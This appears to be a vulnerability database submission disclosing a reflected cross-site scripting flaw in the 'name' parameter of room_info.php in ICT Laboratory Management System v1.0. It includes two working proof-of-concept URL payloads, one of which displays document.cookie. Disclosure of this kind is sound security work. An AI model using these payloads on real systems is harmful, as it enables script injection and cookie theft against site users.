| Title | ICT Laboratory Management System v1.0 /LabManagement/views/room_info.php GET parameter name exists reflected cross-site scripting vulnerability |
|---|
| Description | ICT Laboratory Management System v1.0 has reflected cross-site scripting.
Vulnerability File: /LabManagement/views/room_info.php
GET parameter "name" exists reflected cross-site scripting vulnerability
Payload1:/LabManagement/views/room_info?name=<script>alert('xss')</script>&id=6
Payload2:/LabManagement/views/room_info?name=<script>alert(document.cookie)</script>&id=6 |
|---|
| Source | ⚠️ https://github.com/LeozhangCA/CVEReport/blob/main/XSS.md |
|---|
| User | LeoZhangCA (UID 46757) |
|---|
| Submission | 05/13/2023 12:22 (3 years ago) |
|---|
| Moderation | 05/14/2023 09:47 (21 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 228973 [SourceCodester ICT Laboratory Management System 1.0 GET Parameter views/room_info.php Name cross site scripting] |
|---|
| Points | 19 |
|---|